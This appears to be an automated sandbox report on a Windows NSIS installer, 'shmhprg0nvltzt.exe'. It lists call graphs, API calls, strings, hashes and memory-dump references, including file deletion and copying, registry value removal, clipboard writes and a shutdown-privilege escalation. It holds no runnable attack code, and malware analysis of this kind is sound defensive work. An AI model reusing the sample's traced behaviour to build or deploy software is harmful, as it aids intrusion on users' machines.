403c67 lstrcatW 3400->3401 3403 40640b 3 API calls 3400->3403 3404 403c16 3401->3404 3403->3401 3512 403ec2 3404->3512 3407 405f14 18 API calls 3408 403c99 3407->3408 3409 403d2d 3408->3409 3411 40640b 3 API calls 3408->3411 3410 405f14 18 API calls 3409->3410 3412 403d33 3410->3412 3414 403ccb 3411->3414 3413 403d43 LoadImageW 3412->3413 3415 40657a 17 API calls 3412->3415 3416 403de9 3413->3416 3417 403d6a RegisterClassW 3413->3417 3414->3409 3418 403cec lstrlenW 3414->3418 3422 405e39 CharNextW 3414->3422 3415->3413 3421 40140b 2 API calls 3416->3421 3419 403da0 SystemParametersInfoW CreateWindowExW 3417->3419 3420 403df3 3417->3420 3423 403d20 3418->3423 3424 403cfa lstrcmpiW 3418->3424 3419->3416 3420->3314 3425 403def 3421->3425 3426 403ce9 3422->3426 3428 405e0c 3 API calls 3423->3428 3424->3423 3427 403d0a GetFileAttributesW 3424->3427 3425->3420 3430 403ec2 18 API calls 3425->3430 3426->3418 3429 403d16 3427->3429 3431 403d26 3428->3431 3429->3423 3432 405e58 2 API calls 3429->3432 3433 403e00 3430->3433 3528 40653d lstrcpynW 3431->3528 3432->3423 3435 403e0c ShowWindow 3433->3435 3436 403e8f 3433->3436 3438 40689a 3 API calls 3435->3438 3520 405672 OleInitialize 3436->3520 3440 403e24 3438->3440 3439 403e95 3441 403eb1 3439->3441 3442 403e99 3439->3442 3443 403e32 GetClassInfoW 3440->3443 3445 40689a 3 API calls 3440->3445 3444 40140b 2 API calls 3441->3444 3442->3420 3449 40140b 2 API calls 3442->3449 3446 403e46 GetClassInfoW RegisterClassW 3443->3446 3447 403e5c DialogBoxParamW 3443->3447 3444->3420 3445->3443 3446->3447 3448 40140b 2 API calls 3447->3448 3448->3420 3449->3420 3450->3286 3451->3334 3452->3301 3453->3340 3454->3351 3456 405b53 CloseHandle 3455->3456 3457 405b5f 3455->3457 3456->3457 3457->3351 3459 405bb2 3458->3459 3460 403a76 ExitProcess 3459->3460 3461 405bc6 MessageBoxIndirectW 3459->3461 3461->3460 3463 406069 GetTickCount GetTempFileNameW 3462->3463 3464 40352b 3463->3464 3465 40609f 3463->3465 3464->3288 3465->3463 3465->3464 3466->3368 3467->3370 3468->3374 3470 403022 3469->3470 3471 40303a 3469->3471 3472 403032 3470->3472 3473 40302b DestroyWindow 3470->3473 3474 403042 3471->3474 3475 40304a GetTickCount 3471->3475 3472->3377 3473->3472 3507 406946 3474->3507 3477 403058 CreateDialogParamW ShowWindow 3475->3477 3478 40307b 3475->3478 3477->3478 3478->3377 3480->3385 3482 4032cd 3481->3482 3483 4032fb 3482->3483 3511 4034e5 SetFilePointer 3482->3511 3485 4034cf ReadFile 3483->3485 3486 403306 3485->3486 3487 403468 3486->3487 3488 403318 GetTickCount 3486->3488 3498 403464 3486->3498 3489 4034aa 3487->3489 3493 40346c 3487->3493 3488->3498 3502 403367 3488->3502 3491 4034cf ReadFile 3489->3491 3490 4034cf ReadFile 3490->3502 3491->3498 3492 4034cf ReadFile 3492->3493 3493->3492 3494 40348e 3493->3494 3493->3498 3494->3493 3495 4060df WriteFile 3494->3495 3496 403452 3494->3496 3494->3498 3495->3494 3496->3498 3497 4033bd GetTickCount 3497->3502 3498->3391 3499 4033e2 MulDiv wsprintfW 3500 40559f 24 API calls 3499->3500 3500->3502 3501 4060df WriteFile 3501->3502 3502->3490 3502->3496 3502->3497 3502->3498 3502->3499 3502->3501 3504 4060b0 ReadFile 3503->3504 3505 4034e2 3504->3505 3505->3393 3506->3384 3508 406963 PeekMessageW 3507->3508 3509 403048 3508->3509 3510 406959 DispatchMessageW 3508->3510 3509->3377 3510->3508 3511->3483 3513 403ed6 3512->3513 3529 406484 wsprintfW 3513->3529 3515 403f47 3516 403f7b 18 API calls 3515->3516 3518 403f4c 3516->3518 3517 403c77 3517->3407 3518->3517 3519 40657a 17 API calls 3518->3519 3519->3518 3521 4044e5 SendMessageW 3520->3521 3524 405695 3521->3524 3522 4056bc 3523 4044e5 SendMessageW 3522->3523 3525 4056ce OleUninitialize 3523->3525 3524->3522 3526 401389 2 API calls 3524->3526 3525->3439 3526->3524 3527->3404 3528->3409 3529->3515 4359 401a30 4360 402da6 17 API calls 4359->4360 4361 401a39 ExpandEnvironmentStringsW 4360->4361 4362 401a4d 4361->4362 4364 401a60 4361->4364 4363 401a52 lstrcmpW 4362->4363 4362->4364 4363->4364 4370 4023b2 4371 4023ba 4370->4371 4373 4023c0 4370->4373 4372 402da6 17 API calls 4371->4372 4372->4373 4374 402da6 17 API calls 4373->4374 4375 4023ce 4373->4375 4374->4375 4376 4023dc 4375->4376 4377 402da6 17 API calls 4375->4377 4378 402da6 17 API calls 4376->4378 4377->4376 4379 4023e5 WritePrivateProfileStringW 4378->4379 4380 402434 4381 402467 4380->4381 4382 40243c 4380->4382 4383 402da6 17 API calls 4381->4383 4384 402de6 17 API calls 4382->4384 4385 40246e 4383->4385 4386 402443 4384->4386 4391 402e64 4385->4391 4388 402da6 17 API calls 4386->4388 4390 40247b 4386->4390 4389 402454 RegDeleteValueW RegCloseKey 4388->4389 4389->4390 4392 402e71 4391->4392 4393 402e78 4391->4393 4392->4390 4393->4392 4395 402ea9 4393->4395 4396 4063aa RegOpenKeyExW 4395->4396 4397 402ed7 4396->4397 4398 402ee7 RegEnumValueW 4397->4398 4405 402f0a 4397->4405 4406 402f81 4397->4406 4399 402f71 RegCloseKey 4398->4399 4398->4405 4399->4406 4400 402f46 RegEnumKeyW 4401 402f4f RegCloseKey 4400->4401 4400->4405 4402 40690a 5 API calls 4401->4402 4404 402f5f 4402->4404 4403 402ea9 6 API calls 4403->4405 4404->4406 4407 402f63 RegDeleteKeyW 4404->4407 4405->4399 4405->4400 4405->4401 4405->4403 4406->4392 4407->4406 4408 401735 4409 402da6 17 API calls 4408->4409 4410 40173c SearchPathW 4409->4410 4411 401757 4410->4411 4412 401d38 4413 402d84 17 API calls 4412->4413 4414 401d3f 4413->4414 4415 402d84 17 API calls 4414->4415 4416 401d4b GetDlgItem 4415->4416 4417 402638 4416->4417 4418 4014b8 4419 4014be 4418->4419 4420 401389 2 API calls 4419->4420 4421 4014c6 4420->4421 4422 40263e 4423 402652 4422->4423 4424 40266d 4422->4424 4425 402d84 17 API calls 4423->4425 4426 402672 4424->4426 4427 40269d 4424->4427 4434 402659 4425->4434 4428 402da6 17 API calls 4426->4428 4429 402da6 17 API calls 4427->4429 4431 402679 4428->4431 4430 4026a4 lstrlenW 4429->4430 4430->4434 4439 40655f WideCharToMultiByte 4431->4439 4433 40268d lstrlenA 4433->4434 4435 4026d1 4434->4435 4436 4026e7 4434->4436 4438 40610e 5 API calls 4434->4438 4435->4436 4437 4060df WriteFile 4435->4437 4437->4436 4438->4435 4439->4433

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 0040352D Relevance: 88.0, APIs: 34, Strings: 16, Instructions: 450stringfilecomCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 11 403614 5->11 8 403620-403634 call 40689a lstrlenA 6->8 13 403636-403652 call 40690a * 3 8->13 11->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 25 40365c 21->25 25->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 37 4037f8-403812 GetTempPathW call 4034fc 33->37 35 4036f5-4036fb 34->35 36 4036ee-4036f3 34->36 38 403702-403706 35->38 39 4036fd-403701 35->39 36->35 36->36 47 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 37->47 48 40386a-403882 DeleteFileW call 40307d 37->48 41 4037c6-4037d4 call 405e39 38->41 42 40370c-403712 38->42 39->38 41->32 59 4037d6-4037d7 41->59 45 403714-40371b 42->45 46 40372c-403765 42->46 52 403722 45->52 53 40371d-403720 45->53 54 403781-4037bb 46->54 55 403767-40376c 46->55 47->48 62 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 47->62 64 403888-40388e 48->64 65 403a59-403a67 ExitProcess OleUninitialize 48->65 52->46 53->46 53->52 57 4037c3-4037c5 54->57 58 4037bd-4037c1 54->58 55->54 61 40376e-403776 55->61 57->41 58->57 63 4037e6-4037f3 call 40653d 58->63 59->32 66 403778-40377b 61->66 67 40377d 61->67 62->48 62->65 63->37 69 403894-4038a7 call 405e39 64->69 70 403935-40393c call 403bec 64->70 72 403a69-403a78 call 405b9d ExitProcess 65->72 73 403a7e-403a84 65->73 66->54 66->67 67->54 88 4038f9-403906 69->88 89 4038a9-4038de 69->89 84 403941-403944 70->84 75 403a86-403a9b GetCurrentProcess OpenProcessToken 73->75 76 403afc-403b04 73->76 81 403acc-403ada call 40690a 75->81 82 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 75->82 85 403b06 76->85 86 403b09-403b0c ExitProcess 76->86 95 403ae8-403af3 ExitWindowsEx 81->95 96 403adc-403ae6 81->96 82->81 84->65 85->86 90 403908-403916 call 405f14 88->90 91 403949-40395d call 405b08 lstrcatW 88->91 93 4038e0-4038e4 89->93 90->65 106 40391c-403932 call 40653d * 2 90->106 104 40396a-403984 lstrcatW lstrcmpiW 91->104 105 40395f-403965 lstrcatW 91->105 98 4038e6-4038eb 93->98 99 4038ed-4038f5 93->99 95->76 102 403af5-403af7 call 40140b 95->102 96->95 96->102 98->99 100 4038f7 98->100 99->93 99->100 100->88 102->76 109 403a57 104->109 110 40398a-40398d 104->110 105->104 106->70 109->65 112 403996 call 405aeb 110->112 113 40398f-403994 call 405a6e 110->113 119 40399b-4039ab SetCurrentDirectoryW 112->119 113->119 121 4039b8-4039e4 call 40653d 119->121 122 4039ad-4039b3 call 40653d 119->122 126 4039e9-403a04 call 40657a DeleteFileW 121->126 122->121 129 403a44-403a4e 126->129 130 403a06-403a16 CopyFileW 126->130 129->126 132 403a50-403a52 call 4062fd 129->132 130->129 131 403a18-403a38 call 4062fd call 40657a call 405b20 130->131 131->129 140 403a3a-403a41 CloseHandle 131->140 132->109 140->129
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                                                                                                                                                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                                                                                                                                                                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                                                                                                                                                                                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                                                                                                                                                                                • CharNextW.USER32(00000000,"C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe" ,00000020,"C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe" ,00000000), ref: 004036D6
                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                                                                                                                                                                                                  • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Program Files (x86)\E6l40hhe,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe" ,00000000,?), ref: 0040397C
                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                                                                                                                                                                                                • CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?), ref: 00403A59
                                                                                                                                                                                                                                • OleUninitialize.OLE32(?), ref: 00403A5E
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403A78
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403B0C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                                                                                                                • String ID: "C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe" $.tmp$1033$C:\Program Files (x86)\E6l40hhe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                                • API String ID: 2292928366-4092604979
                                                                                                                                                                                                                                • Opcode ID: 6c3bd8c22d6e18a8b5ab610896a1dc0f2008672ff6007d1aefcbe699feda6b26
                                                                                                                                                                                                                                • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c3bd8c22d6e18a8b5ab610896a1dc0f2008672ff6007d1aefcbe699feda6b26
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405C49 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148filestringCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 440 405c49-405c6f call 405f14 443 405c71-405c83 DeleteFileW 440->443 444 405c88-405c8f 440->444 445 405e05-405e09 443->445 446 405c91-405c93 444->446 447 405ca2-405cb2 call 40653d 444->447 448 405db3-405db8 446->448 449 405c99-405c9c 446->449 455 405cc1-405cc2 call 405e58 447->455 456 405cb4-405cbf lstrcatW 447->456 448->445 451 405dba-405dbd 448->451 449->447 449->448 453 405dc7-405dcf call 406873 451->453 454 405dbf-405dc5 451->454 453->445 464 405dd1-405de5 call 405e0c call 405c01 453->464 454->445 458 405cc7-405ccb 455->458 456->458 460 405cd7-405cdd lstrcatW 458->460 461 405ccd-405cd5 458->461 463 405ce2-405cfe lstrlenW FindFirstFileW 460->463 461->460 461->463 465 405d04-405d0c 463->465 466 405da8-405dac 463->466 480 405de7-405dea 464->480 481 405dfd-405e00 call 40559f 464->481 468 405d2c-405d40 call 40653d 465->468 469 405d0e-405d16 465->469 466->448 471 405dae 466->471 482 405d42-405d4a 468->482 483 405d57-405d62 call 405c01 468->483 472 405d18-405d20 469->472 473 405d8b-405d9b FindNextFileW 469->473 471->448 472->468 476 405d22-405d2a 472->476 473->465 479 405da1-405da2 FindClose 473->479 476->468 476->473 479->466 480->454 486 405dec-405dfb call 40559f call 4062fd 480->486 481->445 482->473 487 405d4c-405d55 call 405c49 482->487 491 405d83-405d86 call 40559f 483->491 492 405d64-405d67 483->492 486->445 487->473 491->473 495 405d69-405d79 call 40559f call 4062fd 492->495 496 405d7b-405d81 492->496 495->473 496->473
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,\*.*), ref: 00405CBA
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Stuffiness7.dat$\*.*
                                                                                                                                                                                                                                • API String ID: 2035342205-3920725043
                                                                                                                                                                                                                                • Opcode ID: d4824498ca5d4646401654330336f54dc3516ea2401a274e156101c2699109e4
                                                                                                                                                                                                                                • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4824498ca5d4646401654330336f54dc3516ea2401a274e156101c2699109e4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00406873 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(76F73420,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 0040688A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                                                                                • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 141 4056de-4056f9 142 405888-40588f 141->142 143 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 141->143 145 405891-4058b3 GetDlgItem CreateThread FindCloseChangeNotification 142->145 146 4058b9-4058c6 142->146 165 4057e4-4057e7 143->165 166 4057c8-4057e2 SendMessageW * 2 143->166 145->146 148 4058e4-4058ee 146->148 149 4058c8-4058ce 146->149 150 4058f0-4058f6 148->150 151 405944-405948 148->151 153 4058d0-4058df ShowWindow * 2 call 4044ce 149->153 154 405909-405912 call 404500 149->154 155 4058f8-405904 call 404472 150->155 156 40591e-40592e ShowWindow 150->156 151->154 159 40594a-405950 151->159 153->148 162 405917-40591b 154->162 155->154 163 405930-405939 call 40559f 156->163 164 40593e-40593f call 404472 156->164 159->154 167 405952-405965 SendMessageW 159->167 163->164 164->151 170 4057f7-40580e call 404499 165->170 171 4057e9-4057f5 SendMessageW 165->171 166->165 172 405a67-405a69 167->172 173 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 167->173 180 405810-405824 ShowWindow 170->180 181 405844-405865 GetDlgItem SendMessageW 170->181 171->170 172->162 178 405998-4059a8 GetWindowRect 173->178 179 4059ab-4059c0 TrackPopupMenu 173->179 178->179 179->172 182 4059c6-4059dd 179->182 183 405833 180->183 184 405826-405831 ShowWindow 180->184 181->172 185 40586b-405883 SendMessageW * 2 181->185 186 4059e2-4059fd SendMessageW 182->186 187 405839-40583f call 4044ce 183->187 184->187 185->172 186->186 188 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 186->188 187->181 190 405a24-405a4b SendMessageW 188->190 190->190 191 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 190->191 191->172
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040573C
